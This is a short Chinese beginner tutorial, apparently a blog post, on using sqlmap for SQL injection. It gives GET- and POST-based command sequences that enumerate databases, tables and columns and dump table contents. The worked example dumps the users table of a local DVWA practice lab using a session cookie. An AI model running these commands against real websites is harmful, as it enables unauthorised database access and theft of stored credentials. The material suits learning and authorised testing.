sqlmap入门使用

1get型注入

1.1检查注入点

python sqlmap.py -u "xxxx网站"

1.2查看数据库

python sqlmap.py -u "xxxx网站" --dbs

1.3查看数据库中的表

python sqlmap.py -u "xxxx网站" -D 数据库名 --tables

1.4查看数据库中的表的列

python sqlmap.py -u "xxxx网站" -D 数据库名 -T 表名 --columns

1.5查看数据库中的表中所有内容

python sqlmap.py -u "xxxx网站" -D 数据库名 -T 表名 --columns --dump

2post型注入

2.1首先需要拦截包,然后以txt的形式保存到sqlmap路径下
2.2查看数据库中的表中所有内容

python sqlmap.py -r 文件名字.txt -D 数据库名 -T 表名 --columns --dump

tips:
1:post和get型注入在sqlmap中的使用只在于 get中是 -u “url” 而post是 -r 文件名.txt
2:-p 传输的参数名 可以指定本次注入参数

补充

带有登录凭证的页面是需要登录凭证的,所以使用sqlmap时也要带上登录凭证。

网页F12查看,点击存储
在这里插入图片描述

python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"   --cookie="PHPSESSID=84nrp5ikbuiv4dte1hi2ggjbd6;security=low" -D dvwa -T users --columns --dump
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值